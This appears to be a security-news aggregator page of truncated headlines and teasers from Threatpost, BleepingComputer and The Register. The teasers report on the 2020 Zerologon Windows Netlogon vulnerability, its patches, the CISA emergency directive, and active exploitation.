Microsoft clarified the steps customers should take to make sure that their devices are protected against ongoing attacks using Windows Server Zerologon (CVE-2020-1472) exploits.
The company revised the advisory after customers found Microsoft's original guidance confusing and were unsure if applying the patch was enough to protect vulnerable Windows Server devices from attacks.
In a step-by-step approach, the updated advisory now explains the exact actions that administrators need ...

Zerologon Patches Roll Out Beyond Microsoft
Threatpost • Tara Seals • 23 Sep 2020

The “perfect” Windows vulnerability known as the Zerologon bug is getting a patch assist from two non-Microsoft sources, as they strive to fill in the gaps that the official fix doesn’t address.
Both Samba and 0patch have issued fixes for CVE-2020-1472, which, as previously reported, stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user- and machine-authentication.
Exploiting the bug allows an unauthent...

Microsoft: Hackers using Zerologon exploits in attacks, patch now!
BleepingComputer • Lawrence Abrams • 23 Sep 2020

Microsoft has warned that attackers are actively using the Windows Server Zerologon exploits in attacks and advises all Windows administrators to install the necessary security updates.
As part of the
security updates, Microsoft fixed a critical 10/10 rated security vulnerability known as '
 | Netlogon Elevation of Privilege Vulnerability'.
This vulnerability has been named 'Zerologon' by cybersecurity firm Secura, and when exploited, allows attackers to
 and t...

DHS Issues Dire Patch Warning for ‘Zerologon’
Threatpost • Tom Spring • 21 Sep 2020

Federal agencies that haven’t patched their Windows Servers against the ‘Zerologon’ vulnerability by Monday Sept. 21 at 11:59 pm EDT are in violation of a rare emergency directive issued by the Secretary of Homeland Security.
With only hours until the deadline for the directive, issued on Friday, to be executed, what is at stake is a “vulnerability [that] poses an unacceptable risk to the Federal Civilian Executive Branch and requires an immediate and emergency action,” according...

Windows Exploit Released For Microsoft ‘Zerologon’ Flaw
Threatpost • Lindsey O'Donnell • 15 Sep 2020

Proof-of-concept (PoC) exploit code has been released for a Windows flaw, which could allow attackers to infiltrate enterprises by gaining administrative privileges, giving them access to companies’ Active Directory domain controllers (DCs).
The vulnerability, dubbed “Zerologon,” is a privilege-escalation glitch (CVE-2020-1472) with a CVSS score of 10 out of 10, making it critical in severity. The flaw was addressed in Microsoft’s August 2020 security updates. However, this week at...

Windows Zerologon PoC exploits allow domain takeover. Patch Now!
BleepingComputer • Lawrence Abrams • 15 Sep 2020

Researchers have released exploits for the Windows Zerologon CVE-2020-1472 vulnerability that allow an attacker to take control of a Windows domain. Install patches now!
As part of the August 2020 Patch Tuesday security updates, Microsoft fixed a critical 10/10 rated security vulnerability known as '
| Netlogon Elevation of Privilege Vulnerability'.
After successfully exploiting this vulnerability, attackers are able to elevate their privileges to a domain administrator and t...

Two 0-Days Under Active Attack, Among 120 Bugs Patched by Microsoft
Threatpost • Tom Spring • 11 Aug 2020

Two Microsoft vulnerabilities are under active attack, according to the software giant’s August Patch Tuesday Security Updates. Patches for the flaws are available for the bugs, bringing this month’s total number of vulnerabilities to 120.
One of the flaws being exploited in the wild is (CVE-2020-1464), a Windows-spoofing bug tied to the validation of file signatures on Windows 10, 7 8.1 and versions of Windows Server. Rated “important,” the flaw allows an adversary to “bypass secur...

The Register

Administrators running Samba as their domain controllers should update their installations as the open-source software suffers from the same ZeroLogon hole as Microsoft's Windows Server.
An alert from the project confirms its code, in certain configurations, is also vulnerable to the CVE-2020-1472 bug, which can be exploited to gain domain-level administrator access. The vulnerability lies in the design of Microsoft's Netlogon Remote Protocol (MS-NRPC), which Samba inherited as it supports...

Microsoft Weekly Roundup: Windows 10, Ignite 2020, bugs and fixes
BleepingComputer • Mayank Parmar • 01 Jan 1970

In our first Microsoft weekly news roundup, we bring you the latest news regarding Windows 10, Microsoft, and this week's Ignite 2020 conference.



During Ignite 2020, Microsoft highlighted the new improvements coming to Windows 10's WSL, Microsoft Teams, Your Phone, and other products. In addition, Microsoft also acknowledged a new issue in September 2020 patch and offered fix for those getting WSL "Element not found" error.
Below is the list of top new features ...

Microsoft August 2020 Patch Tuesday fixes 2 zero-days, 120 flaws
BleepingComputer • Lawrence Abrams • 01 Jan 1970

Today is Microsoft's August 2020 Patch Tuesday, and while this is just a typical day for most of you, Windows administrators around the world want to pull their hair out.
With the release of the August 2020 Patch Tuesday security updates, Microsoft has released one Servicing Stack Update for Windows 10 advisory and fixes for 120 vulnerabilities in Microsoft products.
Of these vulnerabilities, 17 are classified as Critical, and 103 are classified as Important.
This release is...

QNAP warns of Windows Zerologon flaw affecting some NAS devices
BleepingComputer • Sergiu Gatlan • 01 Jan 1970

Network-attached storage device maker QNAP warns customers that some NAS storage devices running vulnerable versions of the QTS operating system are exposed to attacks attempting to exploit the critical Windows ZeroLogon (CVE-2020-1472) vulnerability.
"If exploited, this elevation of privilege vulnerability allows remote attackers to bypass security measures via a compromised QTS device on the network," QNAP explains in a security advisory published on Monday.
"The NAS may be expos...

Hackers used VPN flaws to access US govt elections support systems
BleepingComputer • Sergiu Gatlan • 01 Jan 1970

Government-backed hackers have compromised and gained access to US elections support systems by chaining together VPN vulnerabilities and the recent Windows CVE-2020-1472 security flaw.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) says that advanced persistent threat (APT) actors used this vulnerability chaining tactic to target federal and SLTT (state, local, tribal, and territorial) government networks, as well as election organizations, and critical infrastructure....

The Register

The rather concerning design flaw in Microsoft's netlogon protocol is being exploited in the wild by miscreants, the Windows giant's security team has warned.
The mega-biz today confirmed it is seeing active attacks abusing the CVE-2020-1472 vulnerability, aka ZeroLogon, which can be exploited to bypass authentication and gain domain-level administrator access in corporate networks.
The protocol-level hole affects Windows Server and other software that implements MS-NRPC to provide d...

The Register

Many memorable events get named, whether they're hurricanes, political events, or security incidents like the Morris Worm, which surfaced 32 years ago yesterday.
But named security incidents recently have editorialized their own importance with fear-mongering monikers like Heartbleed (2014), Meltdown, Spectre, and Foreshadow (2018), and Fallout and ZombieLoad (2019).
Not all do so. There have been less emotionally loaded bug names proposed, like CacheOut, CrossTalk, and RIDL, but nam...

The Register

If you're wondering which bugs in particular miscreants are exploiting to break into, or attempt to break into, US government networks, wonder no more. And then make sure you've patched them.
Uncle Sam's Dept of Homeland Security has this month identified at least six possible routes into the nation's computer systems, and the method used to gain total control over the machines once inside. Those six vulnerabilities are...
...plus CVE-2020-1472, aka ZeroLogon, in Microsoft Windows, w...

The Register

The US Cybersecurity and Infrastructure Security Agency (CISA) has taken the unusual step of issuing an emergency directive that gives US government agencies a four-day deadline to implement a Windows Server patch.
The directive, issued on September 18th, demanded that executive agencies take “immediate and emergency action” to patch CVE-2020-1472, the CVSS-perfect-ten-rated flaw that Dutch security outfit Secura BV said allows attackers to instantly become domain admin by subvertin...

The Register

Uncle Sam's Cybersecurity and Infrastructure Security Agency (CISA) has taken the unusual step of issuing an emergency directive that gives US government agencies a four-day deadline to roll out a Windows Server patch.
The directive, issued on September 18, demanded that executive agencies take “immediate and emergency action” to patch CVE-2020-1472, the CVSS-perfect-ten-rated flaw that Dutch security outfit Secura BV said allows attackers to instantly become domain admin by subvert...

The Register

Patch Tuesday used to be Microsoft's day to release patches. Now Adobe, Intel, and SAP are routinely joining the fun – with special guest star Red Hat this month.
If you've felt overwhelmed by the sheer number of security patches Microsoft has emitted this year, you are not alone. Patch watchers at the Zero Day Initiative said that, including the 120 product security bulletins posted this August, Microsoft is just 11 patches away from surpassing its 2019 full-year total wit...